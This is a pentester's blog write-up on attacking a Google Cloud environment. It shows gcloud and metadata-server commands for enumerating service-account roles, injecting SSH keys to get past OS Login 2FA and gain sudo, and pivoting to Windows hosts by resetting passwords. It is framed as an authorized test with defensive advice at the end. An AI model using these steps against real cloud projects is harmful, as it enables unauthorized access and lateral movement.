Enumeration and lateral movement in GCP environments

Security Shenanigans
Published in InfoSec Write-ups · 8 min read · Jun 1, 2022

This write-up covers a pentest in which we compromised a hybrid, GCP-hosted infrastructure using native GCP tools for situational awareness and lateral movement.

Before we proceed, I'd like to state that we didn't come up with a lot of the things I'm going to explain; most of them can be found in two excellent articles, one from GitLab's red team and the other a Medium blog post by Tomasz W. I recommend reading both before continuing!

Initial Compromise

I'll briefly cover how we got a foothold inside the company's network. After doing the initial recon and gathering interesting IPs in scope, a fierce scan of the adjacent IP address space returned a ScriptCase server (we later confirmed this was shadow cloud infrastructure that somebody forgot to remove after testing).

(Before anybody tries to access this, the IP address and port have been changed for privacy reasons.)

After brute-forcing the service for a short while, we discovered trivial credentials for the admin account and were able to run a callback script from inside the instance.

I'm not going to go into detail, since this part of the pentest was unique to the client and probably won't be useful to readers.

Enumeration and privilege escalation

We landed on the instance with a daemon account under which the ScriptCase service was running. Whenever you land on a specific cloud environment, it's always a good idea to use the native tools that environment provides to perform initial enumeration (for example the aws binary provided by aws-cli in AWS, or gcloud/gsutil in the case of GCP). This was one of the first things we tried.

Huh. First problem. It seems the daemon account doesn't have permission to create the folders needed to run the gcloud binary. Maybe we should try manually downloading the binary and running it from a tmp folder. Let's check how our account is configured in /etc/passwd (default shell, home dir, etc.).
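The check itself is a one-liner (a minimal sketch; the exact fields depend on the distro, this is the typical Debian layout):

```shell
# Look up the daemon account's entry in /etc/passwd:
# the last two fields are the home directory and the login shell.
grep '^daemon:' /etc/passwd
```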

That's something to fix. Our default shell is nologin (standard for most service accounts, as they're not intended to be used interactively), and our home dir is /usr/sbin, to which we won't have write access (otherwise escalating our privileges would be trivial). The gcloud binary needs a home folder to create its config files, so let's give it one and manually run the standalone installer.

Setting up our home and downloading gcloud.
Installing the binary.
gcloud successfully installed.
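The steps in the screenshots boil down to something like this (a sketch; the SDK version number and the /tmp path are illustrative, use whatever writable directory you have):

```shell
# Give gcloud a writable home so it can create its config files.
export HOME=/tmp/home
mkdir -p "$HOME" && cd "$HOME"

# Fetch and unpack the standalone SDK (version number is an example).
curl -sO https://dl.google.com/dl/cloudsdk/channels/rapid/downloads/google-cloud-sdk-388.0.0-linux-x86_64.tar.gz
tar xzf google-cloud-sdk-388.0.0-linux-x86_64.tar.gz

# Non-interactive install; everything lands under $HOME.
./google-cloud-sdk/install.sh --quiet
/tmp/home/google-cloud-sdk/bin/gcloud --version
```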

Success! It involved a couple of steps, but we managed to get GCP’s native tools working in a somewhat restricted environment.

Now that we have access to the binary, let’s try to enumerate our service account roles. It’s important to remember that whenever you create an instance in GCP, it needs to have an associated service account, and therefore one is created for you by default. We can enumerate our roles with:

PROJECT=$(curl http://metadata.google.internal/computeMetadata/v1/project/project-id -H "Metadata-Flavor: Google" -s)
ACCOUNT=$(curl http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/email -H "Metadata-Flavor: Google" -s)
gcloud projects get-iam-policy $PROJECT --flatten="bindings[].members" --format='table(bindings.role)' --filter="bindings.members:$ACCOUNT"

(Remember to replace your gcloud path if you're using a locally installed binary, e.g. /tmp/google-cloud-sdk/bin/gcloud.)

The editor role is the default one associated with service accounts, and it allows privilege escalation. Let's try to modify the instance metadata to inject SSH keys (this method is explained in depth in the GitLab article I linked at the beginning).
First, let's check if there are already some users' keys we can replace. We can get the instance metadata with:

INSTANCENAME=$(curl http://metadata.google.internal/computeMetadata/v1/instance/name -H "Metadata-Flavor: Google" -s)
ZONE=$(curl http://metadata.google.internal/computeMetadata/v1/instance/zone -H "Metadata-Flavor: Google" -s | cut -d/ -f4)
gcloud compute instances describe $INSTANCENAME --zone $ZONE

There don't seem to be any SSH keys in this instance's metadata. Just for reference, this is what it should look like, taken from another instance in the project:

(The keys have been replaced as well, don’t get excited)

We do have one important bit of information in both images: the following line, which specifies that OS Login is being used:

- key: enable-oslogin
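For context, the relevant slice of instance metadata looks roughly like this (values are illustrative; the ssh-keys entry follows the USERNAME:KEY format GCP uses):

```yaml
metadata:
  items:
  - key: enable-oslogin
    value: 'TRUE'
  - key: ssh-keys
    value: |
      someuser:ssh-rsa AAAAB3Nza... someuser@example.com
```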

We'll come back to this later. For now, let's try to inject our keys into the instance metadata:

ssh-keygen -t rsa -C "shenanigans" -f ./key -P "" && cat ./key.pub
echo "shenanigans:$(cat ./key.pub)" > meta.txt  # ssh-keys metadata expects USERNAME:KEY entries
gcloud compute instances add-metadata instance012 --metadata-from-file ssh-keys=meta.txt
Creating our keys.
Injecting them into our metadata.
Trying them out.

Second problem: our SSH keys don't seem to be working. Let's verify that they're present:

Yep, it's all there, so something else must be preventing us from logging in. Remember when we said that OS Login was important? This company had configured mandatory 2FA for SSH logins, and we didn't have a second factor enrolled for our account, so we needed a way to bypass it. If you paid attention to GitLab's article, they explain that the 2FA requirement is not enforced for service accounts. And remember, we're running as a GCP compute instance service account (you can see which one using the auth command):

gcloud auth list

Another cool feature of GCP is that running the ssh command from the compute API will create the keys for your service account, inject them into the destination instance (in this case localhost) and add you to the sudoers group, all by default. Let's try it out:

gcloud compute ssh $INSTANCENAME
Creating our keys and injecting them

We were able to escalate our privileges successfully. Now, let’s move laterally.

Lateral movement

We can start by enumerating the instances in our project:

gcloud compute instances list

The ssh command should work for other instances as well.

One instance down, 3 to go

But for some reason, some of the instances weren't responding to our ssh command:

After doing a quick port scan, we discovered that this project had both Linux and Windows machines.

This is easy to troubleshoot, but scanning an instance is not always the best way to determine its OS. You might be on a Red Team engagement with an IDS monitoring for scans. You might not have nmap handy (you could probably get away with just telnetting to the port, or using socat or similar, but this is hardly convenient). Or you might want to automate part of the process. Either way, we tried to find ways of querying this through Google's API, and there's no easy way to do it unless, by sheer luck, you have the alpha compute API enabled (which we've never seen IRL).

Luckily there's a workaround: when you query instance info, one of the fields in the JSON result is the licensing information, which lets you deduce the instance's OS. We can query it with:

INSTANCES=$(gcloud compute instances list --format=json | jq -r .[].name)
ZONE=$(curl http://metadata.google.internal/computeMetadata/v1/instance/zone -H "Metadata-Flavor: Google" -s | cut -d/ -f4)
for i in $INSTANCES; do echo "$i:" && gcloud compute instances describe "$i" --zone $ZONE --format=json | jq -r .disks[].licenses[] | rev | cut -d/ -f1 | rev && echo; done
Enumerating OS info based on licensing records
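The tail of that pipeline just keeps the last path component of each license URL. With a sample value (illustrative, but in the shape the API returns):

```shell
# Example license URL as returned in disks[].licenses[] (illustrative value).
LICENSE="https://www.googleapis.com/compute/v1/projects/windows-cloud/global/licenses/windows-server-2019-dc"

# rev + cut + rev keeps everything after the final slash.
echo "$LICENSE" | rev | cut -d/ -f1 | rev   # windows-server-2019-dc
```

Anything with a windows-* license is a Windows box; the rest are Linux.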

Knowing the OS of an instance is great, but how do we actually pivot to Windows hosts? Well, there's a command similar to compute ssh but for Windows, explained in Tomasz W.'s article:

gcloud compute reset-windows-password g-xbz-qlikview-01 --user=shenanigans

After a quick proxy definition in proxychains, we should be able to RDP into the instance with our newly created user:

proxychains4 xfreerdp /u:shenanigans /p:';QfJt@fJt\fJtHfJt4)L' /v:172.21.31.8
*hacker voice* “We’re in”
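For completeness, the "quick proxy definition" was a dynamic SOCKS tunnel through the Linux instance we already controlled (something like `ssh -D 1080 shenanigans@<pivot-ip>`), plus a matching entry at the end of the proxychains config (port is illustrative):

```
# tail of /etc/proxychains4.conf - the port matches the ssh -D argument
[ProxyList]
socks5 127.0.0.1 1080
```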

Conclusion

When setting up your cloud infrastructure, it's important to be aware that some configurations might not be 100% secure by default. There's a constant fight between security and usability, and sometimes the scale favours the latter, especially when single default commands do things like:

  • creating SSH keys for you
  • injecting them into a target instance
  • adding your keys to that instance's metadata
  • adding you to the sudoers group

(For those of you who didn't pay attention, here's the command I'm talking about:)

gcloud compute ssh $INSTANCENAME

I also mentioned it before, but I'd like to reiterate: there are a lot of resources on which I based this write-up, and two of the most useful were:

- These pentest notes by Tomasz W.
- This post by Chris Moberly

Go read them, they’re awesome.


I’m a security engineer who enjoys writing about experiences in the infosec field.